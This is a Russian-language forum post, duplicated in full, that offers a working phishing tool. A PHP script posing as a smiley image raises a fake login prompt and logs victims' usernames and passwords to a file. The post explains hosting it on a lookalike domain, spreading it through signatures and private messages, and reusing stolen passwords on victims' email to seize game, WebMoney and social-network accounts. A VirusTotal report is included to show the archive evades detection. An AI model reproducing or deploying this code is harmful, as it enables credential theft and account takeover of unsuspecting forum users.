H0oL1GaN
11.11.2009, 21:18
ДОБАВЛЮ : сайты можно и с юкоза, но я регал на [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Вот не помню где нашел, классная штука..
Вот описание :
Суть угона заключается в простом смайлике, который запрашивает авторизацию, вы регистрируетесь на форуме, ставите себе в подпись, или можете кому то в лс отправить его, или в сообщение добавить [ img ]ссылка на смайл[ /img ]
вот и все, как только человек увидит этот смайл, у него выскакивает такая табличка
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Сверху пишет сайт на котором у вас этот смайл,( потому и рекомендую делать его в типе : login или похожу что то на сайт того форума где разводите )
внизу то что вы уже сами можете написать ,мне нужно было для пульса, я написал pulseworld.ru , это вы можете редактировать в самом скрипте..
Ниже в теме все описано что для этого нужно редактировать
собственно это и есть окно авторизации, для того что бы такое прокатило, вам нужно зарегистрировать сайт, с ФТП , я зарегал на h16.ru , но можете и на Ucoz'е, лудше всего регать , как я увидел на своем опыте, сайт примерно такой : login-сайт вашего сервера или что то такое, например : login-zhyk.h16.ru , ну или что то в этом роде , круче придумаете , будет больше шанс развести кого то..
заливаете файлы с архива, на свой сайт, точней на ФТП, вам нужно залить все файлы, и .htaccess , не знаю как у вас но у меня через тотал и через файрзиллу не лило, пришлось качать ФТП Commander.
сама суть развода заключается вот в чем: вы кидаете смайл, который запрашивает авторизацию, т.к. это не смайл а PHP скрипт.. я сам в этом не очень конечно разбираюсь но стараюсь на нормальном языке рассказать.. как понял сам.
Это код скрипта, тут все описано, в зависимости где хотите разводить , надо менять скрипт , то есть эту строчку :
"Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] Basic realm="pulseworld.ru"');"
я например просто ради прикола хотел потестить работает ли оно на самом деле, оказалось работает..
на ФТП моего сайта мне в файле passwords.txt в него мне записывали пароли тех кто авторизовался в моем смайле... каждый акк и пасс в новом рядке.
<?
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
if(strlen($pass) <= 4 || !$login)
{
Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] 401 Unauthorized');
Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] Basic realm="Авторизуйтесь Пожалуйста"');
}
elseif($login)
{
//ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
setcookie('LOGON',md5($pass));
//запишем пароли в файл
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Это конечно круто, но зачем нам какой то акк от форума, какое он даст нам преимущество.., а вот какое:
Вот мы уже знаем АКК и пасс ,человека которого развели, пусть для примера это будет .. Акк : qip пасс: piq
ну попадется на развод много народу , нам нужно выбрать того, у кого на ваш взгляд - может быть Какой то нормальный шмот, или пушка или еще какие то преимущества , что бы не делать всего этого зря.
На форуме заходим в вкладку изменить эмейл, там видим, пишет: Ваш текущий эмейл например будет : [Ссылки могут видеть только зарегистрированные и активированные пользователи] , в большинстве случаев пароль от форума соответствует паролю от эмейла в 80-90% случаях..
С эмейла нам тоже ничего не взять,"но" на эмейле может быть регистрации с других серверов, и в них пароли и аккаунты от сервера, например регистрируемся на ла2 ворлд, и тебе на эмейл приходит сообщение, "Поздравляем с успешной регистрацией, ваш аккаунт такой то , и пароль такой то"
Так можно найти много хорошего, даже те же пароли от Веб мани, или что то в этом роде.. и даже тот же контакт, в котором могут быть голоса,
Вот и сама ссылка на файл, в архиве есть видео мануал, и еще файл блокнота
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
в котором есть описание автора, этой проделки, но описание на этом форуме ,Описание делал сам,мой мануал с тем что в архиве не имеет ничего общего, (оттуда ничего не копировал), мануал писал я сам .
вот мой смайл, можете вводить авторизацию любые слова, и у вас покажет смайл, можете нажать отменить и все одно увидите, но при разводе народ вводит свой акк потому что думают - что это окно авторизации для форума
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
вот отчет с вирус тотала
Файл basic-auth_vs_forums.rar получен 2009.11.11 18:14:59 (UTC)
Антивирус Версия Обновление Результат
a-squared 4.5.0.41 2009.11.11 -
AhnLab-V3 5.0.0.2 2009.11.11 -
Antiy-AVL 2.0.3.7 2009.11.11 -
Authentium 5.2.0.5 2009.11.11 -
Avast 4.8.1351.0 2009.11.11 -
AVG 8.5.0.423 2009.11.11 -
BitDefender 7.2 2009.11.11 -
CAT-QuickHeal 10.00 2009.11.11 -
ClamAV 0.94.1 2009.11.11 -
Comodo 2919 2009.11.11 -
DrWeb 5.0.0.12182 2009.11.11 -
eSafe 7.0.17.0 2009.11.11 -
eTrust-Vet 35.1.7115 2009.11.11 -
F-Prot 4.5.1.85 2009.11.11 -
F-Secure 9.0.15370.0 2009.11.09 -
Fortinet 3.120.0.0 2009.11.11 -
GData 19 2009.11.11 -
Ikarus T3.1.1.74.0 2009.11.11 -
K7AntiVirus 7.10.893 2009.11.10 -
Kaspersky 7.0.0.125 2009.11.11 -
McAfee 5799 2009.11.11 -
McAfee+Artemis 5799 2009.11.11 -
McAfee-GW-Edition 6.8.5 2009.11.11 -
Microsoft 1.5202 2009.11.11 -
NOD32 4596 2009.11.11 -
Norman 6.03.02 2009.11.10 -
nProtect 2009.1.8.0 2009.11.11 -
Panda 10.0.2.2 2009.11.11 -
PCTools 7.0.3.5 2009.11.11 -
Rising 22.21.02.09 2009.11.11 -
Sophos 4.47.0 2009.11.11 -
Sunbelt 3.2.1858.2 2009.11.11 -
Symantec 1.4.4.12 2009.11.11 -
TheHacker 6.5.0.2.065 2009.11.11 -
TrendMicro 9.0.0.1003 2009.11.11 -
VBA32 3.12.10.11 2009.11.10 suspected of RAR.MailBomb
ViRobot 2009.11.11.2031 2009.11.11 -
VirusBuster 4.6.5.0 2009.11.10 -
Дополнительная информация
File size: 5646562 bytes
MD5...: 6dbbd5dc19eaeb1e5069adcca4ea69a6
SHA1..: 60440cbe0e4592c27fbc79053bed053aca404c0d
SHA256: 166162f12a7d09dda1935243b1936df6290c5c0af2abf6e555 45e78ced7fe483
ssdeep: 98304:Bieh9wG2pr3/y35tgghFZAeyXjOul1FHKgDZ1DQQpFBxRS4QCp5SdSoWOf<br>SlYU/8:BiO923/a5zZvcHKkzDQQp28inrAv/YUq<br>
PEiD..: -
PEInfo: -
RDS...: NSRL Reference Data Set<br>-
pdfid.: -
P.S.- думаю за старание что я скок строчил это можно и поставить ©П©
P.S.S - Еще для модератора, если не в той теме попрошу перенести, или даже если это понравится то закрепить, или если уже есть тема, то удалить её.
З.ы. - если что то не понятно то задавайте вопросы, по возможности буду отвечать если что то непонятно
Вот не помню где нашел, классная штука..
Вот описание :
Суть угона заключается в простом смайлике, который запрашивает авторизацию, вы регистрируетесь на форуме, ставите себе в подпись, или можете кому то в лс отправить его, или в сообщение добавить [ img ]ссылка на смайл[ /img ]
вот и все, как только человек увидит этот смайл, у него выскакивает такая табличка
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Сверху пишет сайт на котором у вас этот смайл,( потому и рекомендую делать его в типе : login или похожу что то на сайт того форума где разводите )
внизу то что вы уже сами можете написать ,мне нужно было для пульса, я написал pulseworld.ru , это вы можете редактировать в самом скрипте..
Ниже в теме все описано что для этого нужно редактировать
собственно это и есть окно авторизации, для того что бы такое прокатило, вам нужно зарегистрировать сайт, с ФТП , я зарегал на h16.ru , но можете и на Ucoz'е, лудше всего регать , как я увидел на своем опыте, сайт примерно такой : login-сайт вашего сервера или что то такое, например : login-zhyk.h16.ru , ну или что то в этом роде , круче придумаете , будет больше шанс развести кого то..
заливаете файлы с архива, на свой сайт, точней на ФТП, вам нужно залить все файлы, и .htaccess , не знаю как у вас но у меня через тотал и через файрзиллу не лило, пришлось качать ФТП Commander.
сама суть развода заключается вот в чем: вы кидаете смайл, который запрашивает авторизацию, т.к. это не смайл а PHP скрипт.. я сам в этом не очень конечно разбираюсь но стараюсь на нормальном языке рассказать.. как понял сам.
Это код скрипта, тут все описано, в зависимости где хотите разводить , надо менять скрипт , то есть эту строчку :
"Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] Basic realm="pulseworld.ru"');"
я например просто ради прикола хотел потестить работает ли оно на самом деле, оказалось работает..
на ФТП моего сайта мне в файле passwords.txt в него мне записывали пароли тех кто авторизовался в моем смайле... каждый акк и пасс в новом рядке.
<?
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
if(strlen($pass) <= 4 || !$login)
{
Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] 401 Unauthorized');
Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] Basic realm="Авторизуйтесь Пожалуйста"');
}
elseif($login)
{
//ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
setcookie('LOGON',md5($pass));
//запишем пароли в файл
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Это конечно круто, но зачем нам какой то акк от форума, какое он даст нам преимущество.., а вот какое:
Вот мы уже знаем АКК и пасс ,человека которого развели, пусть для примера это будет .. Акк : qip пасс: piq
ну попадется на развод много народу , нам нужно выбрать того, у кого на ваш взгляд - может быть Какой то нормальный шмот, или пушка или еще какие то преимущества , что бы не делать всего этого зря.
На форуме заходим в вкладку изменить эмейл, там видим, пишет: Ваш текущий эмейл например будет : [Ссылки могут видеть только зарегистрированные и активированные пользователи] , в большинстве случаев пароль от форума соответствует паролю от эмейла в 80-90% случаях..
С эмейла нам тоже ничего не взять,"но" на эмейле может быть регистрации с других серверов, и в них пароли и аккаунты от сервера, например регистрируемся на ла2 ворлд, и тебе на эмейл приходит сообщение, "Поздравляем с успешной регистрацией, ваш аккаунт такой то , и пароль такой то"
Так можно найти много хорошего, даже те же пароли от Веб мани, или что то в этом роде.. и даже тот же контакт, в котором могут быть голоса,
Вот и сама ссылка на файл, в архиве есть видео мануал, и еще файл блокнота
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
в котором есть описание автора, этой проделки, но описание на этом форуме ,Описание делал сам,мой мануал с тем что в архиве не имеет ничего общего, (оттуда ничего не копировал), мануал писал я сам .
вот мой смайл, можете вводить авторизацию любые слова, и у вас покажет смайл, можете нажать отменить и все одно увидите, но при разводе народ вводит свой акк потому что думают - что это окно авторизации для форума
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
вот отчет с вирус тотала
Файл basic-auth_vs_forums.rar получен 2009.11.11 18:14:59 (UTC)
Антивирус Версия Обновление Результат
a-squared 4.5.0.41 2009.11.11 -
AhnLab-V3 5.0.0.2 2009.11.11 -
Antiy-AVL 2.0.3.7 2009.11.11 -
Authentium 5.2.0.5 2009.11.11 -
Avast 4.8.1351.0 2009.11.11 -
AVG 8.5.0.423 2009.11.11 -
BitDefender 7.2 2009.11.11 -
CAT-QuickHeal 10.00 2009.11.11 -
ClamAV 0.94.1 2009.11.11 -
Comodo 2919 2009.11.11 -
DrWeb 5.0.0.12182 2009.11.11 -
eSafe 7.0.17.0 2009.11.11 -
eTrust-Vet 35.1.7115 2009.11.11 -
F-Prot 4.5.1.85 2009.11.11 -
F-Secure 9.0.15370.0 2009.11.09 -
Fortinet 3.120.0.0 2009.11.11 -
GData 19 2009.11.11 -
Ikarus T3.1.1.74.0 2009.11.11 -
K7AntiVirus 7.10.893 2009.11.10 -
Kaspersky 7.0.0.125 2009.11.11 -
McAfee 5799 2009.11.11 -
McAfee+Artemis 5799 2009.11.11 -
McAfee-GW-Edition 6.8.5 2009.11.11 -
Microsoft 1.5202 2009.11.11 -
NOD32 4596 2009.11.11 -
Norman 6.03.02 2009.11.10 -
nProtect 2009.1.8.0 2009.11.11 -
Panda 10.0.2.2 2009.11.11 -
PCTools 7.0.3.5 2009.11.11 -
Rising 22.21.02.09 2009.11.11 -
Sophos 4.47.0 2009.11.11 -
Sunbelt 3.2.1858.2 2009.11.11 -
Symantec 1.4.4.12 2009.11.11 -
TheHacker 6.5.0.2.065 2009.11.11 -
TrendMicro 9.0.0.1003 2009.11.11 -
VBA32 3.12.10.11 2009.11.10 suspected of RAR.MailBomb
ViRobot 2009.11.11.2031 2009.11.11 -
VirusBuster 4.6.5.0 2009.11.10 -
Дополнительная информация
File size: 5646562 bytes
MD5...: 6dbbd5dc19eaeb1e5069adcca4ea69a6
SHA1..: 60440cbe0e4592c27fbc79053bed053aca404c0d
SHA256: 166162f12a7d09dda1935243b1936df6290c5c0af2abf6e555 45e78ced7fe483
ssdeep: 98304:Bieh9wG2pr3/y35tgghFZAeyXjOul1FHKgDZ1DQQpFBxRS4QCp5SdSoWOf<br>SlYU/8:BiO923/a5zZvcHKkzDQQp28inrAv/YUq<br>
PEiD..: -
PEInfo: -
RDS...: NSRL Reference Data Set<br>-
pdfid.: -
P.S.- думаю за старание что я скок строчил это можно и поставить ©П©
P.S.S - Еще для модератора, если не в той теме попрошу перенести, или даже если это понравится то закрепить, или если уже есть тема, то удалить её.
З.ы. - если что то не понятно то задавайте вопросы, по возможности буду отвечать если что то непонятно